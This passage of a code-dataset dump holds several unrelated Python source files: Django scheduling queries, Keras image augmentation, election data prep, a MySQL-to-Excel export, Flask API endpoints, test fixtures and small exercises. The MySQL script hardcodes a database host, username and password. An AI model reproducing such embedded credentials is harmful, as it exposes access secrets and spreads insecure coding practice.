interval.\n #\n # START --------------------------------- END\n # o----------------\n # --------------o\n # o--------------------------------------------------o\n return self.get_queryset() \\\n .filter(\n # start < start_date < end\n (Q(starts_at__gt=start) & Q(starts_at__lt=end)) |\n # start < end_date < end\n (Q(ends_at__gt=start) & Q(ends_at__lte=end)) |\n # start <= start_date & end_date => end\n (Q(starts_at__lte=start) & Q(ends_at__gte=end)))\n\n\nclass StandardReservationManager(models.Manager):\n def occuring_at(self, start, end):\n start_day = start.isoweekday()\n start_time = start.time()\n end_day = end.isoweekday()\n end_time = end.time()\n\n # Case I: the 
event takes more than one week: all reservations are\n        # conflicting\n        if (end - start) > timedelta(weeks=1):\n            return self.get_queryset().all()\n\n        # The end day is before the start day. This means that we went through\n        # Sunday, and we just split up the result.\n        elif end_day < start_day:\n            monday0am = (end - timedelta(days=(end_day - 1))).replace(hour=0, minute=0, second=0, microsecond=0)\n            return (self.occuring_at(start, monday0am - timedelta(seconds=1)) | self.occuring_at(monday0am, end))\n\n        # No special case: just filter for reservations overlapping the interval\n        else:\n            return self.get_queryset() \\\n                .filter(\n                    ((Q(start_day=start_day) & Q(start_time__gt=start_time) |\n                      Q(start_day__gt=start_day)) &  # db.start > ob.start\n                     (Q(start_day=end_day) & Q(start_time__lt=end_time) |\n                      Q(start_day__lt=end_day))) |  # db.start < ob.end\n                    ((Q(end_day=start_day) & Q(end_time__gt=start_time) |\n                      Q(end_day__gt=start_day)) &  # db.end > ob.start\n                     (Q(end_day=end_day) & Q(end_time__lt=end_time) |\n                      Q(end_day__lt=end_day))) |  # db.end < ob.end\n                    ((Q(start_day=start_day) & Q(start_time__lt=start_time) |\n                      Q(start_day__lt=start_day)) &  # db.start < ob.start\n                     (Q(end_day=end_day) & Q(end_time__gt=end_time) |\n                      Q(end_day__gt=end_day)))  # db.end > ob.end\n                )\n","sub_path":"apps/scheduling/managers.py","file_name":"managers.py","file_ext":"py","file_size_in_byte":3090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"348751786","text":"from keras.preprocessing.image import ImageDataGenerator\nimport logging\nimport glob\nimport pathlib\nimport cv2\nimport numpy as np\nimport os\nfrom keras.applications.vgg16 import preprocess_input\nfrom keras.preprocessing.image import load_img\nfrom keras.preprocessing.image import img_to_array\nfrom keras.preprocessing.image import array_to_img\nfrom PIL import Image\n\nclass DataModification:\n    def __init__(self, validation_data_path, training_data_path, class_labels):\n        #self.validation_data_path = self.__dataaugmentation__(validation_data_path)\n        self.training_data_path = self.__dataaugmentation__(\"C:/predictions/image\")\n        \n\n    def __dataaugmentation__(self, data_path):\n        trainDataGenerator = ImageDataGenerator(shear_range=0.2, zoom_range=0.2,\n            horizontal_flip=True, rotation_range=20, vertical_flip=True, \n            height_shift_range=0.2)\n        filenames = glob.glob(data_path + '/*/*.JPG', recursive=\"True\") \n        \n        for path in filenames:\n            img = cv2.imread(path, cv2.IMREAD_UNCHANGED) \n            img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n            img = cv2.resize(img, (224,224), interpolation = cv2.INTER_AREA)\n            img = img_to_array(img)\n            img = np.expand_dims(img, axis=0)\n            #img = Image.open(path)\n            #mg = img.resize((224,224), Image.ANTIALIAS)\n            #img = np.expand_dims(img, axis=0)\n            pathlib.Path('{}/{}/{}'.format(data_path, 'augmented',\n                path.split(os.path.sep)[-2])).mkdir(\n                parents=True, exist_ok=True)\n            # print(path)\n            total = 0\n            for image in trainDataGenerator.flow(img, batch_size=1,\n                save_to_dir='{}/{}/{}'.format(data_path, 'augmented',\n                path.split(os.path.sep)[-2]), save_format='png'):\n\n                # print(total)\n                total += 1\n                if total == 150:\n                    break\n        return (data_path + \"/augmented\")\n\ndef myFunc(image):\n    image = np.array(image)\n    hsv_image = cv2.cvtColor(image,cv2.COLOR_RGB2HSV)\n    return Image.fromarray(hsv_image)\n\n#DataModification(\"C:/HiDrive/valid/\",\"C:/HiDrive/train/\", [\"\"])\n\n    \n    
\n","sub_path":"dataaugmentation.py","file_name":"dataaugmentation.py","file_ext":"py","file_size_in_byte":2308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"22975669","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPolitical data prep for project \n\n\"\"\"\n\nimport pandas as pd\n\n#be sure your working directory is referencing the top level of github repository CS5010_Project\n\nlongpath = \"project_data_prep/datasets/\"\n\ninput_file = longpath + \"county_pres.csv\"\n\ndf = pd.read_csv(input_file)\n\n#filter to just the 2016 presidential election\ndf_year_2016 = df.loc[df[\"year\"]== 2016,:]\n\n#rename the \"na\" candidate votes to \"Other\"\ndf_year_2016['party'].fillna(value='Other', inplace = True)\n\n#filter out the rows where county is a null value\nnew_df = df_year_2016[df_year_2016['FIPS'].notnull()]\n\n#we dropped 9 null values for county \n#this dataframe will allow you to see the rows I am dropping for context\n#these rows do not pertain to a county so we can drop with confidence\n\nnull_df = df_year_2016[df_year_2016['FIPS'].isnull()]\n\n#extract just the columns that we need for analysis\nnew_df_subset = new_df[['FIPS','party','candidatevotes','totalvotes']]\n\n#pivot the party column \n\nfinal_df = pd.pivot_table(new_df_subset,values='candidatevotes',columns=['party'], index=['FIPS','totalvotes'])\nfinal_df.reset_index(inplace = True)\n\nfinal_df['FIPS'] = final_df['FIPS'].astype(int)\n\n#add .astype(str) to convert to string\n\n\n#rename for readability\nfinal_df.rename(columns= {'Other':'other_votes','democrat':'democrat_votes','republican':'republican_votes'}, inplace=True)\n\n","sub_path":"project_data_prep/political_data_prep.py","file_name":"political_data_prep.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"16679149","text":"# coding=utf-8\nimport pymysql\nimport xlwt\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\n\ndef get_conn():\n    conn = pymysql.connect(host = \"192.168.6.73\", user='opensips', passwd='opensipsrw', charset='utf8')\n    return conn\n\n\ndef query_all(cur, sql, args):\n    cur.execute(sql, args)\n    return cur.fetchall()\n\n\ndef read_mysql_to_xlsx(filename):\n    # column headers: id, enterprise name, remark, starting number, ending number\n    list_table_head = ['id','企业名称', '备注','起始号码','结束号码']\n    workbook = xlwt.Workbook(encoding = 'utf-8')\n    sheet = workbook.add_sheet('data', cell_overwrite_ok=True)\n    for i in range(len(list_table_head)):\n        sheet.write(0, i, list_table_head[i])\n\n    conn = get_conn()\n    cur = conn.cursor()\n    # the commented query selects expired number segments; the active one selects unexpired ones\n    # sql = 'select e.id,e.name as \"企业名称\",e.remark as \"备注\",ns.numbers_min as \"起始号码\",ns.numbers_max as \"结束号码\" from shyl.numbers_segment ns left join shyl.enterprise e on e.id=ns.enterprise_id where e.expiry_date < now();'\n    sql = 'select e.id,e.name as \"企业名称\",e.remark as \"备注\",ns.numbers_min as \"起始号码\",ns.numbers_max as \"结束号码\" from shyl.numbers_segment ns left join shyl.enterprise e on e.id=ns.enterprise_id where e.expiry_date > now();'\n    results = query_all(cur, sql, None)\n    print(results)\n    conn.commit()\n    cur.close()\n    conn.close()\n    row = 1\n    for result in results:\n        col = 0\n        # print(type(result))\n        # print(result)\n        for item in result:\n            print(item)\n            sheet.write(row, col, item)\n            col += 1\n        row += 1\n    workbook.save(filename)\n\n\nif __name__ == '__main__':\n    
read_mysql_to_xlsx('/tmp/未过期体验号.xls')","sub_path":"commonly_script/mysql_get_to_exel.py","file_name":"mysql_get_to_exel.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"458248271","text":"from random import randint, choice\nfrom turtle import Turtle, Screen\nt = Turtle()\ncolors = ['red', 'blue', 'green', 'yellow', 'purple', 'coral',\n 'brown', 'chocolate4', 'darkSalmon', 'deepskyblue', 'lightgreen']\n\n\ndef paint(sides):\n t.color(choice(colors))\n for _ in range(sides):\n t.forward(100)\n t.right(360 / sides)\n\n\nfor x in range(3, 11):\n paint(x)\n\n\ns = Screen()\ns.exitonclick()\n","sub_path":"18/e3.py","file_name":"e3.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"431809971","text":"# io - Input & Output with Artificial Intelligence (ai) support on AVR. {{{\n#\n# Copyright (C) 2013 Nicolas Schodet\n#\n# APBTeam:\n# Web: http://apbteam.org/\n# Email: team AT apbteam DOT org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n# }}}\nfrom test_simu import TestSimu, run\nfrom Tkinter import *\nimport math\n\nimport io_hub.apbirthday\n\nclass TestSimuControl (TestSimu):\n \"\"\"Interface with extra control.\"\"\"\n\n def __init__ (self, robot_class, *args):\n TestSimu.__init__ (self, robot_class, *args,\n color_switch_set_pos = True)\n self.io = self.robots[0].io\n self.asserv = self.robots[0].asserv\n self.robot_model = self.robots[0].model\n self.io.output (io_hub.apbirthday.output_mask (\n 'cake_arm_in', 'cake_push_far_in', 'cake_push_near_in',\n 'cherry_plate_down', 'cherry_plate_clamp_open', 'gift_in'),\n 'toggle')\n\n def create_widgets (self):\n TestSimu.create_widgets (self)\n self.control_frame = Frame (self)\n self.control_frame.pack (side = 'left', before = self.table_view,\n fill = 'y')\n Button (self.control_frame, text = 'FSM step', padx = 0, pady = 0,\n command = self.fsm_debug).pack ()\n Button (self.control_frame, text = 'Asserv block', padx = 0, pady = 0,\n command = self.asserv_block).pack ()\n def out_button (name, *toggle):\n def command ():\n self.io.output (io_hub.apbirthday.output_mask (*toggle),\n 'toggle')\n button = Button (self.control_frame, text = name,\n padx = 0, pady = 0, command = command)\n button.pack ()\n out_button ('Arm in/out', 'cake_arm_in', 'cake_arm_out')\n out_button ('Push far in/out', 'cake_push_far_in', 'cake_push_far_out')\n out_button ('Push near in/out', 'cake_push_near_in', 'cake_push_near_out')\n out_button ('Plate arm up/down', 'cherry_plate_up', 'cherry_plate_down')\n out_button ('Plate clamp', 'cherry_plate_clamp_close', 'cherry_plate_clamp_open')\n out_button ('Gift', 'gift_in', 'gift_out')\n cannon_var = IntVar ()\n def cannon_cmd ():\n self.io.potentiometer (0, 256 if 
cannon_var.get () else 0)\n Checkbutton (self.control_frame, text = 'Fire!', indicatoron = 0,\n variable = cannon_var, command = cannon_cmd).pack ()\n self.backward_var = IntVar ()\n self.backward_button = Checkbutton (self.control_frame,\n text = 'Backward', variable = self.backward_var)\n self.backward_button.pack ()\n self.goto_var = IntVar ()\n self.goto_button = Checkbutton (self.control_frame,\n text = 'Goto FSM', variable = self.goto_var)\n self.goto_button.pack ()\n self.table_view.bind ('<1>', self.move)\n self.table_view.bind ('<3>', self.orient)\n\n def fsm_debug (self):\n self.io.fsm_debug ()\n\n def asserv_block (self):\n self.asserv.block ()\n\n def move (self, ev):\n pos = self.table_view.screen_coord ((ev.x, ev.y))\n if self.goto_var.get ():\n self.io.goto (pos[0], pos[1], self.backward_var.get ())\n else:\n self.asserv.goto (pos[0], pos[1], self.backward_var.get ())\n\n def orient (self, ev):\n x, y = self.table_view.screen_coord ((ev.x, ev.y))\n robot_pos = self.robot_model.position.pos\n if robot_pos is not None:\n a = math.atan2 (y - robot_pos[1], x - robot_pos[0])\n self.asserv.goto_angle (a)\n\nif __name__ == '__main__':\n run ('apbirthday', TestSimuControl)\n","sub_path":"digital/ai/tools/test_simu_control_apbirthday.py","file_name":"test_simu_control_apbirthday.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"432576963","text":"# EMBL-EBI MetaboLights - https://www.ebi.ac.uk/metabolights\n# Metabolomics team\n#\n# European Bioinformatics Institute (EMBL-EBI), European Molecular Biology Laboratory, Wellcome Genome Campus, Hinxton, Cambridge CB10 1SD, United Kingdom\n#\n# Last modified: 2020-Jan-09\n# Modified by: kenneth\n#\n# Copyright 2020 EMBL - European Bioinformatics Institute\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n\nimport datetime\nimport json\nimport logging\n\nfrom flask import current_app as app\nfrom flask import request, abort\nfrom flask_restful import Resource\nfrom flask_restful_swagger import swagger\n\nfrom app.services.storage_service.acl import Acl\nfrom app.services.storage_service.storage_service import StorageService\nfrom app.utils import metabolights_exception_handler, MetabolightsException\nfrom app.ws.db_connection import update_study_status, update_study_status_change_date\nfrom app.ws.ftp.ftp_utils import get_ftp_folder_access_status, toogle_ftp_folder_permission\nfrom app.ws.isaApiClient import IsaApiClient\nfrom app.ws.mtblsWSclient import WsClient\nfrom app.ws.study.user_service import UserService\nfrom app.ws.validation import validate_study\n\nlogger = logging.getLogger('wslog')\n\n# MetaboLights (Java-Based) WebService client\nwsc = WsClient()\niac = IsaApiClient()\n\n\nclass StudyStatus(Resource):\n @swagger.operation(\n summary=\"Change study status\",\n nickname=\"Change study status\",\n notes='''Change study status from 'Submitted' to 'In Curation'.
\n            Please note that a *minimum* of 28 days is required for curation; this will be added to the release date.\n\n            Curators can change to any of: 'Submitted', 'In Curation', 'In Review', 'Public' or 'Dormant'.\n\n            Example: { \"status\": \"In Curation\" }\n
''',\n parameters=[\n {\n \"name\": \"study_id\",\n \"description\": \"MTBLS Identifier\",\n \"required\": True,\n \"allowMultiple\": False,\n \"paramType\": \"path\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"study_status\",\n \"description\": \"The status to change a study to\",\n \"paramType\": \"body\",\n \"type\": \"string\",\n \"format\": \"application/json\",\n \"required\": True,\n \"allowMultiple\": False\n },\n {\n \"name\": \"user_token\",\n \"description\": \"User API token\",\n \"paramType\": \"header\",\n \"type\": \"string\",\n \"required\": True,\n \"allowMultiple\": False\n }\n ],\n responseMessages=[\n {\n \"code\": 200,\n \"message\": \"OK. The Metabolite Annotation File (MAF) is returned\"\n },\n {\n \"code\": 401,\n \"message\": \"Unauthorized. Access to the resource requires user authentication.\"\n },\n {\n \"code\": 403,\n \"message\": \"Forbidden. Access to the study is not allowed for this user.\"\n },\n {\n \"code\": 404,\n \"message\": \"Not found. The requested identifier is not valid or does not exist.\"\n }\n ]\n )\n @metabolights_exception_handler\n def put(self, study_id):\n\n # param validation\n if study_id is None:\n abort(404, 'Please provide valid parameter for study identifier')\n\n data_dict = json.loads(request.data.decode('utf-8'))\n study_status = data_dict['status']\n\n if study_status is None:\n abort(404, 'Please provide the new study status')\n\n # User authentication\n user_token = None\n if \"user_token\" in request.headers:\n user_token = request.headers[\"user_token\"]\n\n # check for access rights\n is_curator, read_access, write_access, obfuscation_code, study_location, release_date, submission_date, \\\n db_study_status = wsc.get_permissions(study_id, user_token)\n if not read_access:\n abort(403)\n\n if study_status.lower() == db_study_status.lower():\n raise MetabolightsException(message=f\"Status is already {str(study_status)} so there is nothing to change\")\n ftp_private_storage = StorageService.get_ftp_private_storage(app)\n ftp_private_study_folder = study_id.lower() + '-' + obfuscation_code\n\n # Update the last status change date field\n status_date_logged = update_study_status_change_date(study_id)\n if not status_date_logged:\n logger.error(\"Could not update the status_date column for \" + study_id)\n\n isa_study, isa_inv, std_path = iac.get_isa_study(study_id, user_token,\n skip_load_tables=True,\n study_location=study_location)\n\n if is_curator: # Curators can change the date to current date, submitters can not!\n new_date = datetime.datetime.now()\n else:\n new_date = datetime.datetime.now() + datetime.timedelta(+28)\n new_date = new_date.strftime('%Y-%m-%d')\n\n if is_curator: # User is a curator, so just update status without any further checks\n if study_status.lower() == 'public':\n isa_inv.public_release_date = new_date\n isa_study.public_release_date = new_date\n release_date = new_date\n self.update_status(study_id, study_status, is_curator=is_curator,\n obfuscation_code=obfuscation_code, user_token=user_token)\n elif write_access:\n if db_study_status.lower() != 'submitted': # and study_status != 'In Curation':\n abort(403, \"You can not change the study to this status\")\n\n if self.get_study_validation_status(study_id, study_location, user_token, obfuscation_code):\n self.update_status(study_id, study_status, is_curator=is_curator,\n obfuscation_code=obfuscation_code, user_token=user_token)\n\n if release_date < new_date: # Set the release date to a minimum of 28 days in the future\n 
isa_inv.public_release_date = new_date\n isa_study.public_release_date = new_date\n release_date = new_date\n\n else:\n abort(403, \"There are validation errors. Fix any problems before attempting to change study status.\")\n else:\n abort(403, \"You do not have rights to change the status for this study\")\n\n iac.write_isa_study(isa_inv, user_token, std_path, save_investigation_copy=True)\n\n status, message = wsc.reindex_study(study_id, user_token)\n # Explictly changing the FTP folder permission for In Curation and Submitted state\n if db_study_status.lower() != study_status.lower():\n if study_status.lower() == 'in curation':\n ftp_private_storage.remote.update_folder_permission(ftp_private_study_folder, Acl.AUTHORIZED_READ)\n\n if study_status.lower() == 'submitted':\n ftp_private_storage.remote.update_folder_permission(ftp_private_study_folder, Acl.AUTHORIZED_READ_WRITE)\n\n return {\"Success\": \"Status updated from '\" + db_study_status + \"' to '\" + study_status + \"'\",\n \"release-date\": release_date}\n else:\n return {\"Success\": f\"Status updated to {study_status}\",\n \"release-date\": release_date}\n\n @staticmethod\n def update_status(study_id, study_status, is_curator=False, obfuscation_code=None, user_token=None):\n study_status = study_status.lower()\n # Update database\n update_study_status(study_id, study_status, is_curator=is_curator)\n\n @staticmethod\n def get_study_validation_status(study_id, study_location, user_token, obfuscation_code):\n validates = validate_study(study_id, study_location, user_token, obfuscation_code, log_category='error')\n validations = validates['validation']\n status = validations['status']\n\n if status != 'error':\n return True\n\n return False\n\n\nclass ToggleAccess(Resource):\n @swagger.operation(\n summary=\"[Deprecated] Change FTP study folder permission\",\n nickname=\"Change FTP study permission\",\n parameters=[\n {\n \"name\": \"study_id\",\n \"description\": \"MTBLS Identifier\",\n \"required\": True,\n \"allowMultiple\": False,\n \"paramType\": \"path\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"user_token\",\n \"description\": \"User API token\",\n \"paramType\": \"header\",\n \"type\": \"string\",\n \"required\": True,\n \"allowMultiple\": False\n }\n ],\n responseMessages=[\n {\n \"code\": 200,\n \"message\": \"OK. FTP folder permission toggled \"\n },\n {\n \"code\": 401,\n \"message\": \"Unauthorized. Access to the resource requires user authentication.\"\n },\n {\n \"code\": 403,\n \"message\": \"Forbidden. Access to the study is not allowed for this user.\"\n },\n {\n \"code\": 404,\n \"message\": \"Not found. 
The requested identifier is not valid or does not exist.\"\n }\n ]\n )\n @metabolights_exception_handler\n def put(self, study_id):\n\n # param validation\n if study_id is None:\n abort(404, 'Please provide valid parameter for study identifier')\n\n # User authentication\n user_token = None\n if \"user_token\" in request.headers:\n user_token = request.headers[\"user_token\"]\n\n UserService.get_instance(app).validate_user_has_write_access(user_token, study_id)\n return toogle_ftp_folder_permission(app, study_id)\n\nclass ToggleAccessGet(Resource):\n @swagger.operation(\n summary=\"[Deprecated] Get Study FTP folder permission\",\n nickname=\"Get FTP study permission\",\n parameters=[\n {\n \"name\": \"study_id\",\n \"description\": \"MTBLS Identifier\",\n \"required\": True,\n \"allowMultiple\": False,\n \"paramType\": \"path\",\n \"dataType\": \"string\"\n },\n {\n \"name\": \"user_token\",\n \"description\": \"User API token\",\n \"paramType\": \"header\",\n \"type\": \"string\",\n \"required\": True,\n \"allowMultiple\": False\n }\n ],\n responseMessages=[\n {\n \"code\": 200,\n \"message\": \"OK. FTP folder permission returned\"\n },\n {\n \"code\": 401,\n \"message\": \"Unauthorized. Access to the resource requires user authentication.\"\n },\n {\n \"code\": 403,\n \"message\": \"Forbidden. Access to the study is not allowed for this user.\"\n },\n {\n \"code\": 404,\n \"message\": \"Not found. The requested identifier is not valid or does not exist.\"\n }\n ]\n )\n @metabolights_exception_handler\n def get(self, study_id):\n\n # param validation\n if study_id is None:\n abort(404, 'Please provide valid parameter for study identifier')\n\n # User authentication\n user_token = None\n if \"user_token\" in request.headers:\n user_token = request.headers[\"user_token\"]\n\n UserService.get_instance(app).validate_user_has_write_access(user_token, study_id)\n return get_ftp_folder_access_status(app, study_id)\n","sub_path":"app/ws/study_actions.py","file_name":"study_actions.py","file_ext":"py","file_size_in_byte":12503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"322857718","text":"# -*- coding: utf-8 -*-\n\"\"\"Config for py.test: Defining fixtures in here makes them available to test functions.\"\"\"\nimport json\nimport os\nimport pytest\nfrom mock import Mock\nimport requests_mock\n\n\nFIXTURES_DIR = os.path.join(os.path.dirname(__file__), 'fixtures')\n\n\n@pytest.fixture\ndef mock_data_client():\n \"\"\"Mock data client for use in tests. 
These can be overwritten in individual tests.\"\"\"\n mock_data_client = Mock()\n mock_data_client.get_framework.return_value = dict(frameworks=dict(lots=[\n {'slug': 'test_lot_slug_1'},\n {'slug': 'test_lot_slug_2'},\n ]))\n mock_data_client.find_draft_services_iter.return_value = {}\n mock_data_client.export_users.return_value = {\n 'users': [\n {'supplier_id': 12345, 'application_status': 'application', 'extraneous_field': 'foo'},\n {'supplier_id': 23456, 'application_status': 'no_application', 'extraneous_field': 'foo'},\n {'supplier_id': 123, 'application_status': 'application', 'extraneous_field': 'foo'},\n {'supplier_id': 456, 'application_status': 'application', 'extraneous_field': 'foo'},\n {'supplier_id': 789, 'application_status': 'no_application', 'extraneous_field': 'foo'},\n {'supplier_id': 101, 'application_status': 'no_application', 'extraneous_field': 'foo'}\n ]\n }\n\n with open(os.path.join(FIXTURES_DIR, 'test_supplier_frameworks_response.json')) as supplier_frameworks_response:\n mock_data_client.find_framework_suppliers.return_value = json.loads(supplier_frameworks_response.read())\n return mock_data_client\n\n\n@pytest.yield_fixture\ndef rmock():\n with requests_mock.mock() as rmock:\n real_register_uri = rmock.register_uri\n\n def register_uri_with_complete_qs(*args, **kwargs):\n if 'complete_qs' not in kwargs:\n kwargs['complete_qs'] = True\n\n return real_register_uri(*args, **kwargs)\n\n rmock.register_uri = register_uri_with_complete_qs\n\n yield rmock\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"412373878","text":"import logging\nimport re\nimport os\nfrom virtualenv import create_environment\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef install_virtualenv(install_dir):\n if is_virtualenv(install_dir):\n return\n\n create_environment(install_dir, no_setuptools=False,\n no_pip=True, site_packages=False,\n symlink=False)\n\n\nVIRTUALENV_FILES = {\n 'activate file': os.path.join('bin', 'activate')\n}\n\n\ndef is_virtualenv(path):\n \"\"\" validate if the path is already a virtualenv \"\"\"\n for name, venv_path in VIRTUALENV_FILES.items():\n target_path = os.path.join(path, venv_path)\n if not os.path.exists(target_path):\n return False\n return True\n\nINJECT_WRAPPER = \"# URANIUM_INJECT THIS\"\n\nINJECT_MATCH = re.compile(\"(\\n?{0}.*{0}\\n)\".format(INJECT_WRAPPER), re.DOTALL)\n\nINJECT_TEMPLATE = \"\"\"\n{0}\n{{body}}\n{0}\n\"\"\".format(INJECT_WRAPPER)\n\n\ndef inject_into_activate_this(venv_root, body):\n \"\"\"\n inject a body into activate_this.py.\n\n this will overwrite any values previously injected into activate_this.\n \"\"\"\n activate_this_file = os.path.join(venv_root, 'bin', 'activate_this.py')\n inject_into_file(activate_this_file, body)\n\n\ndef inject_into_file(path, body):\n \"\"\" inject into a file \"\"\"\n with open(path) as fh:\n content = fh.read()\n\n content = INJECT_MATCH.sub(\"\", content)\n content += INJECT_TEMPLATE.format(body=body)\n\n with open(path, 'w+') as fh:\n fh.write(content)\n","sub_path":"uranium/virtualenv_manager.py","file_name":"virtualenv_manager.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"173878213","text":"\"\"\"\n@difficulty: easy\n@tags: misc\n@notes: Use a pointer to track the position of target.\n\"\"\"\nclass Solution:\n def buildArray(self, 
target: List[int], n: int) -> List[str]:\n pointer = 0\n res = []\n for i in range(1, n + 1):\n if pointer == len(target):\n break\n if target[pointer] == i:\n res.append(\"Push\")\n pointer += 1\n else:\n res.extend([\"Push\", \"Pop\"])\n return res\n","sub_path":"solution/python/1441.py","file_name":"1441.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"67211509","text":"from UWVV.AnalysisTools.AnalysisFlowBase import AnalysisFlowBase\n\nimport FWCore.ParameterSet.Config as cms\n\n\nclass DressedGenLeptonBase(AnalysisFlowBase):\n def __init__(self, *args, **kwargs):\n self.flag = kwargs.pop('leptonStatusFlag', 'fromHardProcessFinalState')\n super(DressedGenLeptonBase, self).__init__(*args, **kwargs)\n\n def makeAnalysisStep(self, stepName, **inputs):\n step = super(DressedGenLeptonBase, self).makeAnalysisStep(stepName, **inputs)\n\n if stepName == 'selection':\n promptPhotonsMod = cms.EDFilter(\"GenParticleSelector\",\n src = step.getObjTag('a'),\n cut = cms.string(\"pdgId = 22 && statusFlags().isPrompt() && status() == 1\")\n )\n step.addModule('promptPhotonsMod', promptPhotonsMod, 'a')\n \n genEMod = cms.EDFilter(\n \"GenParticleSelector\",\n src = step.getObjTag('e'),\n cut = cms.string(\"abs(pdgId) == 11 && {}\".format(self.flag)),\n )\n step.addModule('genSelectionE', genEMod, 'e')\n \n dressedGenEMod = cms.EDProducer(\"DressedGenParticlesProducer\",\n baseCollection = step.getObjTag('e'),\n associates = step.getObjTag('a'),\n dRmax = cms.untracked.double(0.1)\n )\n step.addModule('dressedElectrons', dressedGenEMod, 'e')\n\n genMuMod = cms.EDFilter(\n \"GenParticleSelector\",\n src = step.getObjTag('m'),\n cut = cms.string(\"abs(pdgId) == 13 && {}\".format(self.flag)),\n )\n step.addModule('genSelectionMu', genMuMod, 'm')\n \n dressedGenMuMod = cms.EDProducer(\"DressedGenParticlesProducer\",\n baseCollection = step.getObjTag('m'),\n associates = step.getObjTag('a'),\n dRmax = cms.untracked.double(0.1)\n )\n step.addModule('dressedMuons', dressedGenMuMod, 'm')\n\n return step\n\n","sub_path":"AnalysisTools/python/templates/DressedGenLeptonBase.py","file_name":"DressedGenLeptonBase.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"166802548","text":"# 有1234 4数字,问能组成多少个无重复数字的三位数,都是多少?\n\ns = (1,2,3,4)\ncount = 0\nfor a in s:\n for b in s:\n for c in s:\n if a != b and b != c and c != a:\n count += 1\n print(a*100 + b * 10 + c)\nprint('有', count, '个这样的三位数')\n","sub_path":"others/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"15354136","text":"# Copyright 2015 OpenStack Foundation\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\"\"\"Tests for manipulating ActionPlan via the DB API\"\"\"\n\nimport six\nfrom watcher.common import exception\nfrom watcher.common import utils as w_utils\nfrom watcher.tests.db import base\nfrom watcher.tests.db import utils\n\n\nclass DbActionPlanTestCase(base.DbTestCase):\n\n def _create_test_audit(self, **kwargs):\n audit = utils.get_test_audit(**kwargs)\n self.dbapi.create_audit(audit)\n return audit\n\n def _create_test_action_plan(self, **kwargs):\n action_plan = utils.get_test_action_plan(**kwargs)\n self.dbapi.create_action_plan(action_plan)\n return action_plan\n\n def test_get_action_plan_list(self):\n uuids = []\n for i in range(1, 6):\n action_plan = utils.create_test_action_plan(uuid=w_utils.generate_uuid())\n uuids.append(six.text_type(action_plan['uuid']))\n res = self.dbapi.get_action_plan_list(self.context)\n res_uuids = [r.uuid for r in res]\n # list.sort() sorts in place and returns None, so compare sorted copies\n self.assertEqual(sorted(uuids), sorted(res_uuids))\n\n def test_get_action_plan_list_with_filters(self):\n audit = self._create_test_audit(\n id=1,\n type='ONESHOT',\n uuid=w_utils.generate_uuid(),\n deadline=None,\n state='ONGOING')\n action_plan1 = self._create_test_action_plan(\n id=1,\n uuid=w_utils.generate_uuid(),\n audit_id=audit['id'],\n first_action_id=None,\n state='RECOMMENDED')\n action_plan2 = self._create_test_action_plan(\n id=2,\n uuid=w_utils.generate_uuid(),\n audit_id=audit['id'],\n first_action_id=action_plan1['id'],\n state='ONGOING')\n\n res = self.dbapi.get_action_plan_list(\n self.context,\n filters={'state': 'RECOMMENDED'})\n self.assertEqual([action_plan1['id']], [r.id for r in res])\n\n res = self.dbapi.get_action_plan_list(\n self.context,\n filters={'state': 'ONGOING'})\n self.assertEqual([action_plan2['id']], [r.id for r in 